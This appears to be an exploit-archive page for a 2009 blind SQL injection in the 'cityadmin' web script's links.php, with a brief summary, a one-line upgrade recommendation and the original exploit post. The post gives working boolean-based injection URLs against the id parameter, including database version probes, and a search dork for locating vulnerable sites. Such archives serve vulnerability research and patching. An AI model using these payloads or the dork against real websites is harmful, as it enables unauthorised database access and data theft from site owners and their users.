header-logo
Suggest Exploit
vendor:
cityadmin
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Blind Sql Injection
89
CWE
Product Name: cityadmin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

cityadmin (links.php) Blind Sql Injection Vulnerability

The vulnerability exists in the links.php page of the cityadmin script. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable page. This can be done by appending a malicious SQL query to the id parameter of the vulnerable page. For example, an attacker can send a request like www.site.com/links.php?id=NULL+and+1=1 to check if the query is true or false.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the cityadmin script.
Source

Exploit-DB raw data:

cityadmin (links.php) Blind Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : cityadmin
.:. Download Script: http://www.redcow.ca/products/cityadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by cityadmin and Red Cow Technologies, Inc."

####################################################################

===[ Exploit ]===

www.site.com/links.php?id=[Blind SQL INJECTION]


www.site.com/links.php?id=NULL+and+1=1       >>> True
www.site.com/links.php?id=NULL+and+1=2       >>> False


www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=5  >>> True
www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=4  >>> False



####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack